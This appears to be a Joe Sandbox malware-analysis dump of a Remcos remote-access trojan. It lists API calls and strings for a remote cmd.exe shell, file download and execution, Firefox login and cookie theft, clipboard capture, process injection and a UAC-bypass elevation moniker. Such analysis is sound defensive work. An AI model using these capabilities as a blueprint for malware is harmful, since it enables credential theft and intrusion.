Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __alldvrm
String ID:
API String ID: 65215352-0
Opcode ID: 28369f91ca91e66110a0b1c9409ed0194f098364de9e422e31faff2ad6e8f38b
Instruction ID: 96d9d97d68b67d0c8e80b5665a39335b0ee5c72343be31c2f0b4d265a228e715
Opcode Fuzzy Hash: 28369f91ca91e66110a0b1c9409ed0194f098364de9e422e31faff2ad6e8f38b
Instruction Fuzzy Hash: 08012872950318BFDB24EF64C942B6E77ECEB0531DF10846FE48597240C6799D00C75A

Function 00446137 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF

Function 0040489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,00000000), ref: 004048B3

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
Instruction ID: a24ce82555f98f109a53945ea9c337c8597cdca763f75144b39f195b4e3f482d
Opcode Fuzzy Hash: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
Instruction Fuzzy Hash: 0DD0C9325586088AE620AAB4AD0B8A4775C8312615F0007AA6CA5835D2E6446A19C2AA

Function 004027A7 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

std::_Deallocate.LIBCONCRT ref: 00402E2B

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Deallocatestd::_
String ID:
API String ID: 1323251999-0
Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647

Function 00411CA3 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
Instruction ID: 079a7b638a28e99b338f4493b6ebfa8105bff269478f0661155a893ef6bf0f7e
Opcode Fuzzy Hash: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
Instruction Fuzzy Hash: 13B00872418382EBCF02DF90DD0492ABAB2BB88741F184C5CB2A14107187228428EB06

Non-executed Functions

Function 00407C97 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00407CB9
GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
DeleteFileW.KERNEL32(00000000), ref: 00407DA9

Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9

Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
GetLogicalDriveStringsA.KERNEL32 ref: 00408278
SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
DeleteFileA.KERNEL32(?), ref: 00408652

Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF

Sleep.KERNEL32(000007D0), ref: 004086F8
StrToIntA.SHLWAPI(00000000), ref: 0040873A

Part of subcall function 0041C9E2: SystemParametersInfoW.USER32 ref: 0041CAD7

Strings

XPG, xrefs: 00407DED
XPG, xrefs: 004082E7
open, xrefs: 00408191
(PG, xrefs: 004081F2
NG, xrefs: 00407CE5
Unable to delete: , xrefs: 00407E07
Failed to download file: , xrefs: 004080A5
Deleted file: , xrefs: 00407DC8
Downloading file: , xrefs: 00407F7D
Executing file: , xrefs: 004081AD
XPG, xrefs: 00408718
Unable to rename file!, xrefs: 00408413
Downloaded file: , xrefs: 0040802E
Browsing directory: , xrefs: 00408238
XPG, xrefs: 00408430

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
API String ID: 1067849700-181434739
Opcode ID: 721a015d6a9c076b7bac1dde7b43afd618aed7f88cd0ee72eb4701297df75cd6
Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
Opcode Fuzzy Hash: 721a015d6a9c076b7bac1dde7b43afd618aed7f88cd0ee72eb4701297df75cd6
Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B

Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004056E6

Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36

__Init_thread_footer.LIBCMT ref: 00405723
CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9

Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776

WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
TerminateProcess.KERNEL32(00000000), ref: 00405A17
CloseHandle.KERNEL32 ref: 00405A23
CloseHandle.KERNEL32 ref: 00405A2B
CloseHandle.KERNEL32 ref: 00405A3D
CloseHandle.KERNEL32 ref: 00405A45

Strings

SystemDrive, xrefs: 00405761
0lG, xrefs: 00405954
0lG, xrefs: 0040585A
kG, xrefs: 004057DB
cmd.exe, xrefs: 0040574D
0lG, xrefs: 004056D0
0lG, xrefs: 00405988
0lG, xrefs: 00405A2D

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
API String ID: 2994406822-18413064
Opcode ID: 1862bce2dc0c3d09fc806bd69049e4aad0b0f5de3bc5dc206e92713c06308653
Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
Opcode Fuzzy Hash: 1862bce2dc0c3d09fc806bd69049e4aad0b0f5de3bc5dc206e92713c06308653
Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D

Function 004120F7 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00412106

Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
Part of subcall function 00413877: RegCloseKey.KERNEL32(004660A4), ref: 004138AB

OpenMutexA.KERNEL32 ref: 00412146
CloseHandle.KERNEL32(00000000), ref: 00412155
CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A

Strings

WinDir, xrefs: 0041221B, 00412270
fsutil.exe, xrefs: 0041230F
rmclient.exe, xrefs: 004122EA
\system32\, xrefs: 00412209
Watchdog module activated, xrefs: 00412184, 004123DC
svchost.exe, xrefs: 004122C5
\SysWOW64\, xrefs: 00412261
WDH, xrefs: 004121B5, 004121BB, 00412420
Watchdog launch failed!, xrefs: 00412383
Remcos restarted by watchdog!, xrefs: 00412160

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
API String ID: 3018269243-13974260
Opcode ID: 94cd0e690e29393e168c36f2201fa927646a70d566ab7c517b625d411d554f8e
Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
Opcode Fuzzy Hash: 94cd0e690e29393e168c36f2201fa927646a70d566ab7c517b625d411d554f8e
Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E

Function 0040BB30 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
FindClose.KERNEL32(00000000), ref: 0040BBC9
FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
FindClose.KERNEL32(00000000), ref: 0040BD12

Strings

\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040BB52
\logins.json, xrefs: 0040BC34
\key3.db, xrefs: 0040BC76
UserProfile, xrefs: 0040BB60
[Firefox StoredLogins not found], xrefs: 0040BBD4
[Firefox StoredLogins Cleared!], xrefs: 0040BCFF

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
API String ID: 1164774033-3681987949
Opcode ID: 8d7aaefdbbb17da70651c85bfc14742a28090f78922c13758640ed364e1dedc2
Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
Opcode Fuzzy Hash: 8d7aaefdbbb17da70651c85bfc14742a28090f78922c13758640ed364e1dedc2
Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89

Function 004168C1 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004168C2
EmptyClipboard.USER32 ref: 004168D0
GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
GlobalLock.KERNEL32 ref: 004168F9
GlobalUnlock.KERNEL32(00000000), ref: 0041692F
SetClipboardData.USER32 ref: 00416938
CloseClipboard.USER32 ref: 00416955
OpenClipboard.USER32 ref: 0041695C
GetClipboardData.USER32 ref: 0041696C
GlobalLock.KERNEL32 ref: 00416975
GlobalUnlock.KERNEL32(00000000), ref: 0041697E
CloseClipboard.USER32 ref: 00416984

Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36

Strings

!D@, xrefs: 00417089

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
String ID: !D@
API String ID: 3520204547-604454484
Opcode ID: 87d49a8bb6f540de46fc3d8776ee09c35eeed2095cf9406eee51325eb26e7f5f
Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
Opcode Fuzzy Hash: 87d49a8bb6f540de46fc3d8776ee09c35eeed2095cf9406eee51325eb26e7f5f
Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A

Function 0040BD37 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
FindClose.KERNEL32(00000000), ref: 0040BDC9
FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
FindClose.KERNEL32(00000000), ref: 0040BEAF
FindClose.KERNEL32(00000000), ref: 0040BED0

Strings

\cookies.sqlite, xrefs: 0040BE2C
[Firefox Cookies not found], xrefs: 0040BDD4, 0040BE9C
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040BD52
[Firefox cookies found, cleared!], xrefs: 0040BEDF
UserProfile, xrefs: 0040BD60

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$Close$File$FirstNext
String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 3527384056-432212279
Opcode ID: 8f1e00925697bb1ed9065a8a50f8051e558b025f3b3c4185e977bc1ca5524bae
Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
Opcode Fuzzy Hash: 8f1e00925697bb1ed9065a8a50f8051e558b025f3b3c4185e977bc1ca5524bae
Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E

Function 0040F474 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 210processCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,8.v,?,00475338), ref: 0040F48E
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
CloseHandle.KERNEL32(00000000), ref: 0040F563

Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208

CloseHandle.KERNEL32(00000000), ref: 0040F66E

Strings

ieinstal.exe, xrefs: 0040F6D5
ielowutil.exe, xrefs: 0040F716
Inj, xrefs: 0040F769
8.v, xrefs: 0040F483
C:\Program Files(x86)\Internet Explorer\, xrefs: 0040F6BE

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
String ID: 8.v$C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
API String ID: 3756808967-2206753728
Opcode ID: 90faf2f721b21ffb45675a87819334aaa6a04f4aded6564cc26d2d7333f5989a
Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
Opcode Fuzzy Hash: 90faf2f721b21ffb45675a87819334aaa6a04f4aded6564cc26d2d7333f5989a
Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A

Function 004132D2 Relevance: 18.2, APIs: 12, Instructions: 153fileCOMMON

Download Yara Rule

APIs

CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
GetFileSize.KERNEL32(?,00000000), ref: 00413432
UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
CloseHandle.KERNEL32(00000000), ref: 0041345F
CloseHandle.KERNEL32(?), ref: 00413465

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseHandleView$CreateMappingSizeUnmap
String ID:
API String ID: 297527592-0
Opcode ID: cbaf96c0539d14e3bfc579cb390cbf1a6d01f92e477562203843d299bee7c5bd
Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
Opcode Fuzzy Hash: cbaf96c0539d14e3bfc579cb390cbf1a6d01f92e477562203843d299bee7c5bd
Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E

Function 00419627 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON

Download Yara Rule

Strings

0, xrefs: 00419651
2, xrefs: 004196F4
4, xrefs: 004197B8
VG, xrefs: 0041968B
5, xrefs: 00419809
7, xrefs: 0041982A
6, xrefs: 00419813
1, xrefs: 00419695
3, xrefs: 00419754

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 0$1$2$3$4$5$6$7$VG
API String ID: 0-1861860590
Opcode ID: a0898ada7235e23996d16a558f3c20519f182ec80e29ad8a8220548995af58c0
Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
Opcode Fuzzy Hash: a0898ada7235e23996d16a558f3c20519f182ec80e29ad8a8220548995af58c0
Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96

Function 004074FD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00407521
CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582

Strings

{3E5FC7F9-9A51-4367-9063-A120244FBEC7}, xrefs: 00407516, 0040751B, 0040755A
[-] CoGetObject FAILURE, xrefs: 0040758E
Elevation:Administrator!new:, xrefs: 00407542
$, xrefs: 0040753B
[+] ucmAllocateElevatedObject, xrefs: 00407508
[+] CoGetObject, xrefs: 00407561
[+] CoGetObject SUCCESS, xrefs: 00407595

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Object_wcslen
String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
API String ID: 240030777-3166923314
Opcode ID: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
Opcode Fuzzy Hash: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA

Function 0041A748 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
GetLastError.KERNEL32 ref: 0041A7BB
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: EnumServicesStatus$ErrorLastManagerOpen
String ID:
API String ID: 3587775597-0
Opcode ID: 6acfec477c33960adb53ca531a04b71f608e95b4af76d4dccda85eb8d0b50c1e
Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
Opcode Fuzzy Hash: 6acfec477c33960adb53ca531a04b71f608e95b4af76d4dccda85eb8d0b50c1e
Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A

Function 00452610 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

Part of subcall function 00448215: _free.LIBCMT ref: 00448274
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
IsValidCodePage.KERNEL32(00000000), ref: 00452777
IsValidLocale.KERNEL32(?,00000001), ref: 00452786
GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED

Strings

lJD, xrefs: 00452639, 00452649, 00452709, 004526AB, 004526A0, 004526A3, 004526AE, 0045270C
lJD, xrefs: 00452626, 004527C5
lJD, xrefs: 004526F2, 004526E7, 00452745

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

